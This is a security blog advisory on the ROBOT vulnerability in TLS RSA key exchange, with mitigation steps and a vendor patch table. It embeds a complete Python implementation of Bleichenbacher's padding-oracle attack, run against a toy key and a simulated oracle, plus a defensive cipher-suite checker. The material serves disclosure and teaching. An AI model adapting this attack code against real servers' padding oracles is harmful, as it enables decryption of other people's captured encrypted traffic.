Yesterday a 19-year-old vulnerability called ROBOT (Return Of Bleichenbacher's Oracle Threat) was “rediscovered”. It is a live weakness in implementations of the SSL/TLS cipher suites that use RSA for key exchange: the way a server handles badly padded RSA ciphertexts acts as an oracle that lets an attacker decrypt traffic. The issue was published by Hanno Böck, Juraj Somorovsky (Ruhr-Universität Bochum / Hackmanit GmbH) and Craig Young (Tripwire VERT), who created a dedicated website describing the problem and its implications.

The attack behind ROBOT was originally described by Daniel Bleichenbacher in 1998. It is an adaptive chosen-ciphertext attack against RSA encryption with PKCS #1 v1.5 padding: when an implementation reveals, through a different error message, alert or timing, whether a submitted ciphertext decrypts to correctly padded data, the attacker can submit many ciphertexts derived from a captured one and use those yes/no answers to recover its plaintext. In practical terms this allowed decryption of SSL communication whenever RSA was used for the key exchange, because the captured ciphertext is the encrypted premaster secret from which the session keys are derived.

Although Bleichenbacher published his research and a proof of concept 19 years ago, the designers of TLS chose an insufficient and incomplete workaround rather than redesigning the protocol to eliminate the issue permanently: implementations are told to hide padding failures by continuing the handshake with a random premaster secret, so that a bad ciphertext is indistinguishable from a good one. That leaves every implementation to get the behaviour exactly right, in error handling and in timing, and ROBOT shows that many did not.
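The oracle and the attack described above, as an added example that is not code from the ROBOT authors or from this page: a toy 128-bit RSA key (hopelessly small for real use, chosen so the run finishes in seconds), a PKCS #1 v1.5 padder, an oracle that reports only whether a chosen ciphertext decrypts to a block starting 0x00 0x02 (what a vulnerable TLS server leaks through a distinguishable alert or timing), and the interval-narrowing search from Bleichenbacher's paper that recovers the plaintext from that single bit per query. The key size, RNG seed and message are constructed assumptions.

```python
"""Bleichenbacher's adaptive chosen-ciphertext attack on PKCS #1 v1.5 RSA encryption.
Added example, not code from the ROBOT authors or this page: toy 128-bit key, a padding
oracle that leaks one bit per query, and the interval search that turns it into the plaintext.
Key size, RNG seed and message are constructed assumptions; needs Python 3.8+ for pow(x, -1, n)."""
import random

rng = random.Random(1337)  # fixed seed: same key, padding and query count on every run
ceil_div = lambda a, b: -(-a // b)

def is_probable_prime(n, rounds=32):
    """Miller-Rabin test; n is always a large odd number here."""
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_prime(bits):
    while True:
        p = rng.getrandbits(bits) | (1 << (bits - 1)) | 1  # force top bit and oddness
        if is_probable_prime(p):
            return p

def make_key(bits=128, e=65537):
    """Toy RSA key (d, e, n); 128 bits is absurdly weak but keeps the demo under a few seconds."""
    while True:
        p, q = gen_prime(bits // 2), gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            return pow(e, -1, phi), e, p * q

def pkcs1_v15_pad(msg, k):
    """EME-PKCS1-v1_5: 0x00 0x02 | >= 8 non-zero random bytes | 0x00 | msg, k = byte length of n."""
    assert len(msg) <= k - 11
    ps = bytes(rng.randrange(1, 256) for _ in range(k - 3 - len(msg)))
    return int.from_bytes(b"\x00\x02" + ps + b"\x00" + msg, "big")

def make_oracle(key):
    """The bug ROBOT found in TLS stacks: the server lets an attacker learn whether a chosen
    ciphertext decrypts to something starting 0x00 0x02 (via a distinct alert, timing, ...)."""
    d, _, n = key
    k = (n.bit_length() + 7) // 8
    def oracle(c):
        oracle.queries += 1
        return pow(c, d, n).to_bytes(k, "big")[:2] == b"\x00\x02"
    oracle.queries = 0
    return oracle

def merge(intervals):
    """Union of closed integer intervals."""
    out = []
    for lo, hi in sorted(intervals):
        if out and lo <= out[-1][1] + 1:
            out[-1] = (out[-1][0], max(out[-1][1], hi))
        else:
            out.append((lo, hi))
    return out

def bleichenbacher(c, e, n, oracle):
    """Recover m = c^d mod n from a conforming c using only the oracle (step numbers as in the
    1998 paper). A real ClientKeyExchange is already conforming, so step 1 (blinding) is skipped."""
    k = (n.bit_length() + 7) // 8
    B = 1 << (8 * (k - 2))                     # conforming plaintexts lie in [2B, 3B)
    M = [(2 * B, 3 * B - 1)]
    s = ceil_div(n, 3 * B)                     # step 2a: smallest s with c * s^e conforming
    while not oracle(c * pow(s, e, n) % n):
        s += 1
    while True:
        new = []                               # step 3: keep the parts of M consistent with m*s mod n in [2B, 3B)
        for a, b in M:
            for r in range(ceil_div(a * s - 3 * B + 1, n), (b * s - 2 * B) // n + 1):
                lo, hi = max(a, ceil_div(2 * B + r * n, s)), min(b, (3 * B - 1 + r * n) // s)
                if lo <= hi:
                    new.append((lo, hi))
        M = merge(new)
        if len(M) == 1 and M[0][0] == M[0][1]:
            return M[0][0]                     # step 4: the interval collapsed to m itself
        if len(M) > 1:                         # step 2b: several intervals left, just step s upwards
            s += 1
            while not oracle(c * pow(s, e, n) % n):
                s += 1
        else:                                  # step 2c: one interval, choose s so it roughly halves
            a, b = M[0]
            r = ceil_div(2 * (b * s - 2 * B), n)
            while True:
                lo, hi = ceil_div(2 * B + r * n, b), (3 * B - 1 + r * n) // a
                s = next((t for t in range(lo, hi + 1) if oracle(c * pow(t, e, n) % n)), None)
                if s is not None:
                    break
                r += 1

def demo(secret=b"robot"):
    """Encrypt a padded secret, then recover it through the oracle alone: (secret, query count)."""
    d, e, n = make_key()
    k = (n.bit_length() + 7) // 8
    c = pow(pkcs1_v15_pad(secret, k), e, n)
    oracle = make_oracle((d, e, n))
    em = bleichenbacher(c, e, n, oracle).to_bytes(k, "big")
    return em.split(b"\x00", 2)[2], oracle.queries  # strip 00 02 PS 00

if __name__ == "__main__":
    print(demo())
```

The oracle never sees the private key and never returns the plaintext; every query answers one question, "is this block PKCS-conforming?", and that is enough. Most of the queries are spent in step 2a finding the first conforming multiplier (on the order of ten thousand or more, since a random multiple lands in [2B, 3B) with probability about B/n), which is why the attack needs an oracle that is cheap to query, and why the countermeasure TLS chose, answering identically whether or not the padding is valid, has to be implemented without any observable difference.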

Steps to take

HTTPS admins are advised to update their web servers immediately and, if a fix is not available, to disable the cipher suites that use RSA for key exchange. The table below lists the patches currently available from different vendors. It is worth remembering that the vulnerability does not allow retrieval of the private key from the server, only decryption of messages encrypted to that key (the same oracle can in principle also be used to produce signatures with the key, but far too slowly to do so during a live handshake). As a result cipher suites where RSA is used only for signatures are still safe to use, so all cipher suites with DHE (Diffie-Hellman) or ECDHE (Elliptic Curve Diffie-Hellman) key exchange remain secure. Because the key itself is not exposed, patching or disabling RSA key exchange closes the oracle; recorded traffic only stays at risk if the same key is also deployed on a host that remains vulnerable.

Install the latest vendor patches and/or disable all cipher suites whose names start with “TLS_RSA” (in OpenSSL cipher-string syntax this is the kRSA alias, so add !kRSA; suites such as ECDHE-RSA-AES128-GCM-SHA256 are unaffected because RSA only signs there). According to Cloudflare, less than 1% of all traffic is encrypted with the affected (TLS_RSA) cipher suites, so the impact on customers connecting over HTTPS should be minimal.
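The distinction above, suites that encrypt the premaster secret to the server's RSA key versus suites that only sign with it, as an added example that is not Sysnet's or the ROBOT authors' code: it classifies IANA suite names, shows the OpenSSL cipher string that expresses the fix, and checks against the local OpenSSL that the string really enables no RSA key exchange. The list of offered suites is constructed; the cipher string is one reasonable choice, not a vendor recommendation.

```python
"""Separate static-RSA key-exchange suites (affected by ROBOT) from RSA-signature suites and
verify an OpenSSL cipher string against the local library. Added example, not code from the
page or the ROBOT authors; OFFERED and HARDENED_CIPHERS are constructed."""
import ssl

# Constructed sample: what a scanner might report a server as offering.
OFFERED = [
    "TLS_RSA_WITH_AES_128_GCM_SHA256",          # static RSA key exchange: affected
    "TLS_RSA_WITH_AES_256_CBC_SHA",             # static RSA key exchange: affected
    "TLS_RSA_PSK_WITH_AES_128_CBC_SHA",         # premaster still RSA-encrypted: affected
    "TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256",    # RSA only signs an ephemeral ECDH key: safe
    "TLS_DHE_RSA_WITH_AES_256_GCM_SHA384",      # RSA only signs an ephemeral DH key: safe
    "TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384",  # no RSA at all: safe
    "TLS_AES_128_GCM_SHA256",                   # TLS 1.3, always (EC)DHE: safe
]

def kex_method(iana_name):
    """Key-exchange token of an IANA suite name, TLS_<kex>_WITH_<cipher>_<mac>.
    TLS 1.3 names and signalling values have no key-exchange part and yield 'NONE'."""
    if not iana_name.startswith("TLS_") or "_WITH_" not in iana_name:
        return "NONE"
    return iana_name[len("TLS_"):iana_name.index("_WITH_")]

def uses_static_rsa_kex(iana_name):
    """True for RSA, RSA_EXPORT and RSA_PSK key exchange, where the client encrypts the
    premaster secret to the server's RSA key and a padding oracle can decrypt it.
    DHE_RSA / ECDHE_RSA only sign with RSA, so they are not affected."""
    return kex_method(iana_name).split("_")[0] == "RSA"

def partition(suites):
    """(affected, safe) lists, preserving the order the server offered them in."""
    affected = [s for s in suites if uses_static_rsa_kex(s)]
    safe = [s for s in suites if not uses_static_rsa_kex(s)]
    return affected, safe

# OpenSSL spelling of the same fix: kRSA is the static-RSA key-exchange alias, so !kRSA removes
# every TLS_RSA_* suite while keeping ECDHE-RSA / DHE-RSA (those are aRSA, not kRSA).
HARDENED_CIPHERS = "ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:!aNULL:!kRSA"

def openssl_kex_methods(cipher_string):
    """Key-exchange methods ('kx-rsa', 'kx-ecdhe', ...) the local OpenSSL enables for a string."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.set_ciphers(cipher_string)   # raises ssl.SSLError if nothing matches
    return {c["kea"] for c in ctx.get_ciphers()}

if __name__ == "__main__":
    affected, safe = partition(OFFERED)
    print("disable:", *affected, sep="\n  ")
    print("keep:", *safe, sep="\n  ")
    print(HARDENED_CIPHERS, "->", sorted(openssl_kex_methods(HARDENED_CIPHERS)))
```

The classifier works on names alone, so it can be run over a scanner's output without touching the server; the OpenSSL check is what to run on the web server itself after editing its cipher configuration, since a string that looks right can still be expanded differently by the installed library.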

Vendor        | Advisory / fix                                                                                                   | CVE
F5            | BIG-IP SSL vulnerability                                                                                         | CVE-2017-6168
Citrix        | TLS Padding Oracle Vulnerability in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway | CVE-2017-17382
Radware       | Security Advisory: Adaptive chosen-ciphertext attack vulnerability                                               | CVE-2017-17427
Cisco ACE     | Bleichenbacher Attack on TLS Affecting Cisco Products (End-of-Sale and End-of-Life)                              | CVE-2017-17428
Bouncy Castle | Fix in 1.59 beta 9 (patch / commit)                                                                              | CVE-2017-13098
Erlang        | OTP patch releases, including OTP 20.1.7                                                                         | CVE-2017-1000385
WolfSSL       | GitHub PR / patch                                                                                                | CVE-2017-13099
MatrixSSL     | Changes in 3.8.3                                                                                                 | CVE-2016-6883
Java / JSSE   | Oracle Critical Patch Update Advisory – October 2012                                                             | CVE-2012-5081



If your organisation is impacted by this vulnerability, or you want to raise awareness among your employees, please contact Sysnet; we have the experience and the expertise.
